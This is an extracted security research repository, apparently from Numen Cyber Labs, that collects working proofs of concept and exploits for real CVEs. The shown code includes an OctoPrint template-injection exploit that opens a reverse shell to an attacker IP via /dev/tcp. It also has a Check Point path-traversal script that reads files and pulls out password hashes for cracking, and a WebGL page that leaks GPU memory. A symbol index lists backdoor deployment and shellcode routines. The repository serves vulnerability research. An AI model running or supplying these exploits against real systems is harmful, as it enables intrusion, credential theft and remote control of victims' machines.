log.Println("[+] Step 1 finish...")
// Set evil gcode
payload = `{"scripts":{"gcode":{"afterPrinterConnected":"{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__=='catch_warnings' %} {{ c.__init__.__globals__['__builtins__'].eval(\"__import__('os').popen('bash -c \\\"bash -i >&/dev/tcp/` + reverseIP + `/` + reversePort + ` 0>&1\\\"').read()\") }} {% endif %} {% endfor %}"}},"temperature":{"profiles":[{"name":"ABS","extruder":210,"bed":100,"chamber":null},{"name":"PLA","extruder":180,"bed":60,"chamber":null}]}}`
go setRequest(uri, cookie, payload, 0, &wg)
log.Println("[+] Step 2 finish...")
payload = `{"port":"AUTO","baudrate":0,"printerProfile":"_default","autoconnect":false,"command":"connect"}`
go setRequest(uri, cookie, payload, 1, &wg)
log.Printf("[+] Step 3 reverse: tcp://%s:%s", reverseIP, reversePort)
payload = `{"command":"disconnect"}`
go setRequest(uri, cookie, payload, 1, &wg)
wg.Wait()
}
================================================
FILE: CVE-2024-24919/exp.py
================================================
import argparse
import requests
from urllib3.exceptions import InsecureRequestWarning
import re
import argparse
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def parse_bin_data(bin_data):
internal_password_pattern = re.compile(rb":internal_passw.{3}ord \(([^)]+)\)", re.DOTALL)
internal_password_matches = list(internal_password_pattern.finditer(bin_data))
results = []
for match in internal_password_matches:
internal_password = match.group(1).decode('utf-8', errors='ignore').strip()
if internal_password:
preceding_text = bin_data[:match.start()]
name_pattern = re.compile(rb":name \(([^)]+)\)", re.DOTALL)
name_matches = list(name_pattern.finditer(preceding_text))
if name_matches:
name = name_matches[-1].group(1).decode('utf-8', errors='ignore').strip()
results.append({
'name': name,
'internal_password': internal_password
})
return results
def fget(url,filename):
session = requests.Session()
rawBody = "/CSHELL/../../../../../../../{}".format(filename)
headers = {"Sec-Ch-Ua":"\"Chromium\";v=\"125\", \"Not.A/Brand\";v=\"24\"","Accept":"*/*","Sec-Ch-Ua-Platform":"\"macOS\"","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36","Referer":"https://192.168.161.110/sslvpnc/Portal/Main","Connection":"keep-alive","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"script","Accept-Encoding":"gzip, deflate, br","Accept-Language":"zh-CN,zh;q=0.9","Sec-Ch-Ua-Mobile":"?0","Sec-Fetch-Mode":"no-cors"}
response = session.get("{}/clients/MyCRL".format(url), data=rawBody, headers=headers,verify=False)
s_filename = filename.split("/")[-1]
if int(response.status_code)==200:
print('[+] The vulnerability exists, and the file will be saved locally.')
with open(s_filename, 'wb') as file:
file.write(response.content)
if "fwauth.NDB" in filename:
result = parse_bin_data(response.content)
print("[!] You can use hashcat for brute-forcing.")
print("[!] The type of hash is DES(Unix).")
for entry in result:
print("[+] " + f"Username: {entry['name']}, Password_Hash: {entry['internal_password']}")
else:
print('[!] The target is inappropriate.')
exit()
parser = argparse.ArgumentParser()
parser.add_argument(dest = "url")
parser.add_argument(dest = "filename")
args = parser.parse_args()
fget(args.url,args.filename)
================================================
FILE: CVE-2026-5283/poc.html
================================================
<!DOCTYPE html>
<html><head><title>CVE-2026-5283: GPU Address Leak</title>
<style>
body{font-family:monospace;background:#111;color:#ddd;margin:20px}
canvas{border:1px solid #555;margin:3px}
pre{background:#0a0a0a;padding:10px;max-height:600px;overflow:auto;font-size:11px}
.red{color:#f44;font-weight:bold}.grn{color:#4f4}.yel{color:#ff0}.cyan{color:#0ff}
</style>
</head>
<body>
<h3>CVE-2026-5283: GPU Internal Address Leak</h3>
<div id="canvases"></div>
<pre id="log"></pre>
<script>
const L=s=>{const e=document.getElementById('log');e.innerHTML+=s+'\n';e.scrollTop=e.scrollHeight};
const gl=document.createElement('canvas').getContext('webgl2');
if(!gl){L('No WebGL2');throw'x'}
const dbg=gl.getExtension('WEBGL_debug_renderer_info');
L('Renderer: '+(dbg?gl.getParameter(dbg.UNMASKED_RENDERER_WEBGL):gl.getParameter(gl.RENDERER)));
const SIZE=512, LAYERS=8, CLEAR_LAYER=3;
/*
* Strategy: GPU driver stores internal metadata (texture descriptors,
* buffer descriptors, sampler states, render target info) in the same
* GPU heap as texture data. These contain GPU virtual addresses.
*
* Phase 1: Create LOTS of GPU objects to generate internal metadata
* Phase 2: Delete everything → metadata memory freed to GPU heap
* Phase 3: Allocate array texture → reuses freed metadata memory
* Phase 4: Trigger CVE-2026-5283 → read uninitialized layers
* Phase 5: Scan leaked data for address-like patterns
*/
/* ---- Phase 1: Create many GPU objects to spray internal metadata ---- */
L('\n[Phase 1] Creating GPU objects to spray driver metadata...');
const textures=[], fbos=[], rbs=[], bufs=[], samplers=[], vaos=[];
/* Many textures with various formats → texture descriptors contain base_addr */
for(let i=0;i<100;i++){
const t=gl.createTexture();
gl.bindTexture(gl.TEXTURE_2D,t);
const sz=[64,128,256,512][i%4];
const fmt=[gl.RGBA8,gl.RGBA16F,gl.RGB8,gl.RG8][i%4];
const tp=[gl.UNSIGNED_BYTE,gl.HALF_FLOAT,gl.UNSIGNED_BYTE,gl.UNSIGNED_BYTE][i%4];
const bf=[gl.RGBA,gl.RGBA,gl.RGB,gl.RG][i%4];
gl.texImage2D(gl.TEXTURE_2D,0,fmt,sz,sz,0,bf,tp,null);
gl.texParameteri(gl.TEXTURE_2D,gl.TEXTURE_MIN_FILTER,gl.LINEAR_MIPMAP_LINEAR);
gl.generateMipmap(gl.TEXTURE_2D);
textures.push(t);
}
L(' 100 textures with mipmaps');
/* FBOs with attachments → render target descriptors */
for(let i=0;i<50;i++){
const f=gl.createFramebuffer();
gl.bindFramebuffer(gl.FRAMEBUFFER,f);
if(textures[i])
gl.framebufferTexture2D(gl.FRAMEBUFFER,gl.COLOR_ATTACHMENT0,gl.TEXTURE_2D,textures[i],0);
gl.bindFramebuffer(gl.FRAMEBUFFER,null);
fbos.push(f);
}
L(' 50 FBOs');
/* Renderbuffers → internal storage descriptors */
for(let i=0;i<50;i++){
const r=gl.createRenderbuffer();
gl.bindRenderbuffer(gl.RENDERBUFFER,r);
gl.renderbufferStorage(gl.RENDERBUFFER,[gl.RGBA8,gl.DEPTH24_STENCIL8,gl.DEPTH_COMPONENT16][i%3],[64,128,256][i%3],[64,128,256][i%3]);
rbs.push(r);
}
L(' 50 renderbuffers');
/* Buffers with data → buffer descriptors contain GPU addresses */
for(let i=0;i<100;i++){
const b=gl.createBuffer();
gl.bindBuffer(gl.ARRAY_BUFFER,b);
gl.bufferData(gl.ARRAY_BUFFER,[256,1024,4096,16384][i%4],gl.DYNAMIC_DRAW);
bufs.push(b);
}
L(' 100 buffers');
/* Samplers → sampler state objects */
for(let i=0;i<30;i++){
const s=gl.createSampler();
gl.samplerParameteri(s,gl.TEXTURE_MIN_FILTER,[gl.NEAREST,gl.LINEAR,gl.LINEAR_MIPMAP_LINEAR][i%3]);
gl.samplerParameteri(s,gl.TEXTURE_WRAP_S,[gl.REPEAT,gl.CLAMP_TO_EDGE,gl.MIRRORED_REPEAT][i%3]);
gl.bindSampler(i%4,s);
samplers.push(s);
}
L(' 30 samplers');
/* VAOs → vertex attrib state */
for(let i=0;i<30;i++){
const v=gl.createVertexArray();
gl.bindVertexArray(v);
if(bufs[i]){
gl.bindBuffer(gl.ARRAY_BUFFER,bufs[i]);
gl.vertexAttribPointer(0,4,gl.FLOAT,false,0,0);
gl.enableVertexAttribArray(0);
}
vaos.push(v);
}
gl.bindVertexArray(null);
L(' 30 VAOs');
/* Force GPU to process all object creation */
gl.finish();
/* Also render into some FBOs to generate render target metadata */
for(let i=0;i<20;i++){
gl.bindFramebuffer(gl.FRAMEBUFFER,fbos[i]);
if(gl.checkFramebufferStatus(gl.FRAMEBUFFER)===gl.FRAMEBUFFER_COMPLETE){
gl.viewport(0,0,64,64);
gl.clearColor(Math.random(),Math.random(),Math.random(),1);
gl.clear(gl.COLOR_BUFFER_BIT);
}
}
gl.bindFramebuffer(gl.FRAMEBUFFER,null);
gl.viewport(0,0,SIZE,SIZE);
gl.finish();
L(' Rendered to 20 FBOs');
/* ---- Phase 2: Delete EVERYTHING to free metadata back to GPU heap ---- */
L('\n[Phase 2] Deleting all objects → driver metadata freed to GPU heap...');
for(const v of vaos) gl.deleteVertexArray(v);
for(const s of samplers){gl.deleteSampler(s);}
for(const f of fbos) gl.deleteFramebuffer(f);
for(const r of rbs) gl.deleteRenderbuffer(r);
for(const b of bufs) gl.deleteBuffer(b);
for(const t of textures) gl.deleteTexture(t);
gl.finish();
L(' Deleted 100 tex + 50 FBO + 50 RB + 100 buf + 30 sampler + 30 VAO');
/* ---- Phase 3: Allocate array texture → reuse freed metadata memory ---- */
L('\n[Phase 3] Allocating target array texture...');
const tex2=gl.createTexture();
gl.bindTexture(gl.TEXTURE_2D_ARRAY,tex2);
gl.texImage3D(gl.TEXTURE_2D_ARRAY,0,gl.RGBA8,SIZE,SIZE,LAYERS,0,gl.RGBA,gl.UNSIGNED_BYTE,null);
/* ---- Phase 4: Trigger CVE-2026-5283 ---- */
const clearFBO=gl.createFramebuffer();
gl.bindFramebuffer(gl.FRAMEBUFFER,clearFBO);
gl.framebufferTextureLayer(gl.FRAMEBUFFER,gl.COLOR_ATTACHMENT0,tex2,0,CLEAR_LAYER);
gl.clearColor(0,1,0,1);
gl.clear(gl.COLOR_BUFFER_BIT);
gl.bindFramebuffer(gl.FRAMEBUFFER,null);
gl.deleteFramebuffer(clearFBO);
L('[Phase 4] Cleared layer '+CLEAR_LAYER+' only → bug triggered');
/* ---- Phase 5: Read + scan for GPU addresses ---- */
L('\n[Phase 5] Scanning leaked data for GPU addresses...');
let totalLeaked=0;
const leakedData=[];
for(let layer=0;layer<LAYERS;layer++){
const readFBO=gl.createFramebuffer();
gl.bindFramebuffer(gl.FRAMEBUFFER,readFBO);
gl.framebufferTextureLayer(gl.FRAMEBUFFER,gl.COLOR_ATTACHMENT0,tex2,0,layer);
const px=new Uint8Array(SIZE*SIZE*4);
gl.readPixels(0,0,SIZE,SIZE,gl.RGBA,gl.UNSIGNED_BYTE,px);
gl.bindFramebuffer(gl.FRAMEBUFFER,null);
gl.deleteFramebuffer(readFBO);
let nonzero=0;
for(let i=0;i<px.length;i++) if(px[i]!==0) nonzero++;
if(layer===CLEAR_LAYER){L(' Layer '+layer+': CLEARED');continue}
if(nonzero===0){L(' Layer '+layer+': <span class="grn">zeros</span>');continue}
totalLeaked+=nonzero;
leakedData.push({layer,px});
L(' Layer '+layer+': <span class="red">LEAKED '+nonzero+' bytes</span>');
const u32=new Uint32Array(px.buffer);
/* Scan for address-like patterns:
* GPU virtual addresses on ARM Mali: typically 0x00000000-0x0000FFFF (low) or page-aligned
* GPU virtual addresses on Adreno: various ranges
* Look for: page-aligned values, non-zero upper bits, pointer-like patterns */
/* Pattern 1: Page-aligned values (multiple of 0x1000) */
let pageAligned=0;const pageAddrs=[];
for(let j=0;j<u32.length;j++){
if(u32[j]!==0 && (u32[j]&0xFFF)===0 && u32[j]<0xFFFF0000){
pageAligned++;
if(pageAddrs.length<8) pageAddrs.push('0x'+u32[j].toString(16).padStart(8,'0'));
}
}
if(pageAligned>5){
L(' <span class="cyan">Page-aligned addresses: '+pageAligned+'</span>');
L(' <span class="cyan"> '+pageAddrs.join(', ')+'</span>');
}
/* Pattern 2: Values in typical GPU VA ranges */
let gpuVA=0;const gpuAddrs=[];
for(let j=0;j<u32.length;j++){
const v=u32[j];
/* Common GPU VA ranges on mobile: 0x10000-0x80000000 */
if(v>=0x10000 && v<0x80000000 && v!==0x00FF00FF && v!==0xFF00FF00){
gpuVA++;
if(gpuAddrs.length<8) gpuAddrs.push('0x'+v.toString(16).padStart(8,'0'));
}
}
if(gpuVA>20){
L(' <span class="cyan">GPU VA range values: '+gpuVA+'</span>');
L(' <span class="cyan"> '+gpuAddrs.join(', ')+'</span>');
}
/* Pattern 3: Repeating pointer-like pairs (common in descriptor tables) */
let pairCount=0;const pairs=[];
for(let j=0;j<u32.length-1;j++){
const a=u32[j],b=u32[j+1];
if(a>=0x1000 && a<0x80000000 && b>=0x1000 && b<0x80000000 &&
Math.abs(a-b)<0x100000 && a!==b){
pairCount++;
if(pairs.length<4) pairs.push('(0x'+a.toString(16)+', 0x'+b.toString(16)+')');
}
}
if(pairCount>5){
L(' <span class="cyan">Address pairs (descriptors?): '+pairCount+'</span>');
L(' <span class="cyan"> '+pairs.join(', ')+'</span>');
}
/* Pattern 4: Non-trivial u32 values (not 0, not 0xFF, not 0xFFFF) */
const histogram={};
for(let j=0;j<u32.length;j++){
const v=u32[j];
if(v!==0 && v!==0xFF && v!==0xFF00 && v!==0xFF00FF && v!==0x00FF00FF &&
v!==0xFF00FF00 && v!==0xFFFFFFFF && v!==0xFF000000 && v!==0x00FF0000){
histogram[v]=(histogram[v]||0)+1;
}
}
const unique=Object.keys(histogram).length;
if(unique>100){
L(' <span class="cyan">Unique non-trivial u32: '+unique+' (rich metadata!)</span>');
/* Show top repeated values — likely descriptor fields */
const sorted=Object.entries(histogram).sort((a,b)=>b[1]-a[1]).slice(0,5);
for(const[v,c]of sorted){
L(' <span class="yel"> 0x'+parseInt(v).toString(16).padStart(8,'0')+' × '+c+'</span>');
}
}
/* Entropy */
const hist=new Array(256).fill(0);
for(let i=0;i<px.length;i++) hist[px[i]]++;
let ent=0;
for(let i=0;i<256;i++){if(hist[i]>0){const p=hist[i]/px.length;ent-=p*Math.log2(p)}}
L(' Entropy: '+ent.toFixed(2)+' bits'+(ent>4?' <span class="red">(VERY HIGH)</span>':ent>2?' <span class="yel">(moderate)</span>':''));
/* Hex dump — first 128 bytes as both hex and u32 */
L(' Raw hex: '+Array.from(px.slice(0,64)).map(b=>b.toString(16).padStart(2,'0')).join(' '));
const u32_sample=new Uint32Array(px.buffer,0,16);
L(' As u32: '+Array.from(u32_sample).map(v=>'0x'+v.toString(16).padStart(8,'0')).join(' '));
}
/* Visualize */
const container=document.getElementById('canvases');
for(const{layer,px}of leakedData){
const c=document.createElement('canvas');c.width=256;c.height=256;
container.appendChild(c);const ctx=c.getContext('2d');
const img=ctx.createImageData(256,256);const sc=SIZE/256;
for(let y=0;y<256;y++)for(let x=0;x<256;x++){
const si=(Math.floor(y*sc)*SIZE+Math.floor(x*sc))*4,di=(y*256+x)*4;
img.data[di]=px[si];img.data[di+1]=px[si+1];img.data[di+2]=px[si+2];img.data[di+3]=255;
}
ctx.putImageData(img,0,0);ctx.fillStyle='#fff';ctx.font='11px monospace';
ctx.fillText('Layer '+layer,5,12);
}
L('\n'+'='.repeat(60));
if(totalLeaked>0){
L('<span class="red">CVE-2026-5283: '+totalLeaked+' bytes leaked from '+leakedData.length+' layers</span>');
L('Check above for page-aligned addresses, GPU VA ranges, descriptor pairs');
document.title='LEAK';
}else{
L('<span class="grn">Not vulnerable</span>');
document.title='OK';
}
L('GL error: 0x'+gl.getError().toString(16));
gl.deleteTexture(tex2);
</script>
</body>
</html>
================================================
FILE: README.md
================================================
---
## The PoC/Exploit of some interesting vulnerabilities
### Author: Vulnerability Research Team of Numen Cyber Labs
---
1. TCP/IP RCE Vulnerability (CVE-2022–34718) PoC Restoration and Analysis
https://medium.com/@numencyberlabs/analysis-and-summary-of-tcp-ip-protocol-remote-code-execution-vulnerability-cve-2022-34718-8fcc28538acf
2. CVE-2022–36537 Vulnerability Technical Analysis with Exploit
https://medium.com/@numencyberlabs/cve-2022-36537-vulnerability-technical-analysis-with-exp-667401766746
3. CVE-2021-38003:From Leaking TheHole to Chrome Renderer RCE
https://medium.com/numen-cyber-labs/from-leaking-thehole-to-chrome-renderer-rce-183dcb6f3078
4. CVE-2022–42889:Text4Shell Vulnerability Technical Analysis
https://medium.com/@numencyberlabs/text4shell-or-act4shell-vulnerability-analysis-a860d141e3e5
5. Zero Day Vulnerability: Chromium v8 js engine issue 1303458 — Use After Free in x64 Instruction Optimization Vulnerability Analysis
https://medium.com/bugbountywriteup/zero-day-vulnerability-chromium-v8-js-engine-issue-1303458-use-after-free-in-x64-instruction-e874419436a6
6. CVE-2022-3723: based on google's public poc
https://medium.com/@numencyberlabs/use-native-pointer-of-function-to-bypass-the-latest-chrome-v8-sandbox-exp-of-issue1378239-251d9c5b0d14
7. CVE-2023-41047: OctoPrint Remote Code Execution Vulnerability
https://medium.com/@numencyberlabs/octoprint-remote-code-execution-vulnerability-7e36372d6c2b
8. CVE-2024-24919: Check Point Security Gateways_Arbitrary File Read Vulnerability
https://medium.com/@numencyberlabs/cve-2024-24919-check-point-security-gateways-arbitrary-file-read-vulnerability-f33b296be408
9. CVE-2026–5283: Uninitialized GPU Memory Disclosure via Partial Clear in ANGLE (Chrome WebGL)
https://medium.com/@numencyberlabs/cve-2026-5283-uninitialized-gpu-memory-disclosure-via-partial-clear-in-angle-chrome-webgl-3740ca481149
---
## The Analysis of Web3-related vulnerabilities
### Discovered by Numen Web3 security products
### Author: Web3 Security Team of Numen Cyber Labs
---
1. Analysis of the First Critical Vulnerability of Aptos Move VM
https://medium.com/numen-cyber-labs/analysis-of-the-first-critical-0-day-vulnerability-of-aptos-move-vm-8c1fd6c2b98e
2. The Story of a High-Risk Vulnerability in Move Reference Safety Verify Module
https://medium.com/numen-cyber-labs/the-story-of-a-high-vulnerability-in-move-reference-safety-verify-module-2340f3d8c642
gitextract_jn422405/ ├── CVE-2022-34718/ │ └── poc.cpp ├── CVE-2022-36537/ │ ├── Driver.java │ ├── chromedriver │ ├── cve-2022-36537.py │ ├── mysql-connector-java-5.1.48.jar │ └── requirements.txt ├── CVE-2022-3723/ │ ├── 01.html │ ├── Readme.md │ ├── arr.html │ ├── exp.html │ ├── go.mod │ ├── go.sum │ └── mainHttps.go ├── CVE-2023-23410/ │ └── CVE-2023-23410_poc.c ├── CVE-2023-28231/ │ └── CVE-2023-28231-DHCP-VUL-PoC.cpp ├── CVE-2023-29336/ │ └── poc.cpp ├── CVE-2023-41047/ │ └── CVE-2023-41047.go ├── CVE-2024-24919/ │ └── exp.py ├── CVE-2026-5283/ │ └── poc.html └── README.md
SYMBOL INDEX (49 symbols across 9 files)
FILE: CVE-2022-34718/poc.cpp
function SHA1 (line 44) | void SHA1(PUCHAR str_data, DWORD len)
function BOOL (line 64) | BOOL GetGlobalData()
function main (line 85) | int main()
FILE: CVE-2022-36537/Driver.java
class Driver (line 11) | public class Driver implements java.sql.Driver {
method connect (line 31) | @Override
method acceptsURL (line 36) | @Override
method getPropertyInfo (line 41) | @Override
method getMajorVersion (line 46) | @Override
method getMinorVersion (line 51) | @Override
method jdbcCompliant (line 56) | @Override
method getParentLogger (line 61) | @Override
FILE: CVE-2022-36537/cve-2022-36537.py
function bypass_auth1 (line 39) | def bypass_auth1(target):
function bypass_auth2 (line 59) | def bypass_auth2(target):
function forward_request (line 74) | def forward_request(target, next_uri, cookie_str, uuid, dtid):
function read_file (line 88) | def read_file(target, filename):
function deploy_jdbc_backdoor (line 96) | def deploy_jdbc_backdoor(target):
function upload_jdbc_backdoor (line 141) | def upload_jdbc_backdoor(uri, cookie_str):
function build_jdbc_backdoor (line 152) | def build_jdbc_backdoor():
function banner (line 177) | def banner():
function parse_args (line 182) | def parse_args():
FILE: CVE-2022-3723/mainHttps.go
function faviconHandler (line 85) | func faviconHandler(w http.ResponseWriter, r *http.Request) {
function check (line 89) | func check(e error) {
function isValidAddress (line 94) | func isValidAddress(str string) bool {
function processShellcodeAddr (line 99) | func processShellcodeAddr(str string, code string) (string, error) {
function fileServerHandler (line 107) | func fileServerHandler(w http.ResponseWriter, r *http.Request) {
function main (line 198) | func main() {
FILE: CVE-2023-23410/CVE-2023-23410_poc.c
function wmain (line 7) | int
FILE: CVE-2023-28231/CVE-2023-28231-DHCP-VUL-PoC.cpp
function main (line 8) | int main() {
FILE: CVE-2023-29336/poc.cpp
type _SHELLCODE (line 30) | struct _SHELLCODE {
type tagMENU (line 39) | struct tagMENU
type MyData (line 64) | struct MyData
type ThreadParams (line 96) | struct ThreadParams {
function GetGsValue (line 102) | static unsigned long long GetGsValue(unsigned long long gsValue)
function PVOID (line 106) | PVOID
function PVOID (line 137) | PVOID
function VOID (line 169) | static
function VOID (line 192) | VOID
function ULONG64 (line 225) | ULONG64 Read64(ULONG64 address)
function exploit (line 235) | void exploit()
function buildmem (line 287) | void buildmem()
function WinMain (line 413) | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR l...
function LRESULT (line 505) | LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM ...
function syytem (line 547) | int syytem()
FILE: CVE-2023-41047/CVE-2023-41047.go
constant CSRFTOKEN (line 18) | CSRFTOKEN = "ImU4ZmY1NDhlZTU1ZGI5M2I2MjA3YmZhYjAxY2QzOWQxOTRiN2Q0YTgi.ZU...
function getLoginCookie (line 20) | func getLoginCookie(uri string) string {
function setRequest (line 72) | func setRequest(uri string, cookie string, payload string, types int, wg...
function main (line 110) | func main() {
FILE: CVE-2024-24919/exp.py
function parse_bin_data (line 12) | def parse_bin_data(bin_data):
function fget (line 35) | def fget(url,filename):
Condensed preview — 20 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (83K chars).
[
{
"path": "CVE-2022-34718/poc.cpp",
"chars": 4781,
"preview": "////////////////////////////////////////////////\r\n// ScannerDemo.cpp文件\r\n\r\n#include \"../common/initsock.h\"\r\n\r\n#include <"
},
{
"path": "CVE-2022-36537/Driver.java",
"chars": 1484,
"preview": "package com.mysql.jdbc;\n\nimport java.sql.*;\nimport java.util.*;\nimport java.util.logging.Logger;\n\n/*\n author: Bearcat"
},
{
"path": "CVE-2022-36537/cve-2022-36537.py",
"chars": 8096,
"preview": "#!/usr/bin/env python3\n# coding: utf-8\n\"\"\"\n@File : cve-2022-36537.py\n@Time : 2022/11/11 23:34\n@Author : Bearcat o"
},
{
"path": "CVE-2022-36537/requirements.txt",
"chars": 88,
"preview": "requests==2.28.1\nrequests_toolbelt==0.10.1\nrich==12.6.0\nselenium==4.7.2\nurllib3==1.25.3\n"
},
{
"path": "CVE-2022-3723/01.html",
"chars": 930,
"preview": "<body>\r\n <div id=\"iframeContainer\"></div>\r\n</body>\r\n<script>\r\n var arr = [2.2, 2.2];\r\n window.onload = function"
},
{
"path": "CVE-2022-3723/Readme.md",
"chars": 54,
"preview": "exploit of CVE-2022-3723\n\nbased on google's public poc"
},
{
"path": "CVE-2022-3723/arr.html",
"chars": 6940,
"preview": "<script>\r\n var dv = new DataView(new ArrayBuffer(0x10));\r\n function gc() {\r\n for (var i = 0; i < 0x100; i++"
},
{
"path": "CVE-2022-3723/exp.html",
"chars": 3055,
"preview": "<script>\r\n var arr = [2.2, 2.2];\r\n function exp() {\r\n var dv = new DataView(new ArrayBuffer(0x10));\r\n "
},
{
"path": "CVE-2022-3723/go.mod",
"chars": 87,
"preview": "module httpsServer\n\ngo 1.20\n\nrequire github.com/bytecodealliance/wasmtime-go/v8 v8.0.0\n"
},
{
"path": "CVE-2022-3723/go.sum",
"chars": 736,
"preview": "github.com/bytecodealliance/wasmtime-go/v8 v8.0.0 h1:jP4sqm2PHgm3+eQ50zCoCdIyQFkIL/Rtkw6TT8OYPFI=\ngithub.com/bytecodeall"
},
{
"path": "CVE-2022-3723/mainHttps.go",
"chars": 8533,
"preview": "package main\n\nimport (\n\t\"errors\"\n\t\"flag\"\n\t\"fmt\"\n\t\"github.com/bytecodealliance/wasmtime-go/v8\"\n\t\"io/ioutil\"\n\t\"log\"\n\t\"math"
},
{
"path": "CVE-2023-23410/CVE-2023-23410_poc.c",
"chars": 2270,
"preview": "#define SECURITY_WIN32\r\n#include <http.h>\r\n#include <sspi.h>\r\n#include <strsafe.h>\r\n#pragma warning(disable:4127) // c"
},
{
"path": "CVE-2023-28231/CVE-2023-28231-DHCP-VUL-PoC.cpp",
"chars": 3732,
"preview": "\r\n#include <winsock2.h>\r\n#include <ws2tcpip.h>\r\n#include <iostream>\r\n\r\n#pragma comment(lib, \"Ws2_32.lib\")\r\n\r\nint main()"
},
{
"path": "CVE-2023-29336/poc.cpp",
"chars": 15140,
"preview": "\n// writeup link: https://www.numencyber.com/cve-2023-29336-win32k-analysis/\n\n#include <windows.h>\n//windows server 201"
},
{
"path": "CVE-2023-41047/CVE-2023-41047.go",
"chars": 3881,
"preview": "package main\n\nimport (\n\t\"crypto/tls\"\n\t\"fmt\"\n\t\"log\"\n\t\"net/http\"\n\t\"net/url\"\n\t\"os\"\n\t\"strings\"\n\t\"sync\"\n)\n\nvar (\n\tPROXYURL = "
},
{
"path": "CVE-2024-24919/exp.py",
"chars": 2654,
"preview": "\nimport argparse\nimport requests\nfrom urllib3.exceptions import InsecureRequestWarning\nimport re\nimport argparse\n\n\nreque"
},
{
"path": "CVE-2026-5283/poc.html",
"chars": 11297,
"preview": "<!DOCTYPE html>\n<html><head><title>CVE-2026-5283: GPU Address Leak</title>\n<style>\nbody{font-family:monospace;background"
},
{
"path": "README.md",
"chars": 2449,
"preview": "---\n## The PoC/Exploit of some interesting vulnerabilities\n### Author: Vulnerability Research Team of Numen Cyber Labs\n-"
}
]
// ... and 2 more files (download for full content)
About this extraction
This page contains the full source code of the numencyber/Vulnerability_PoC GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 20 files (16.5 MB), approximately 25.2k tokens, and a symbol index with 49 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.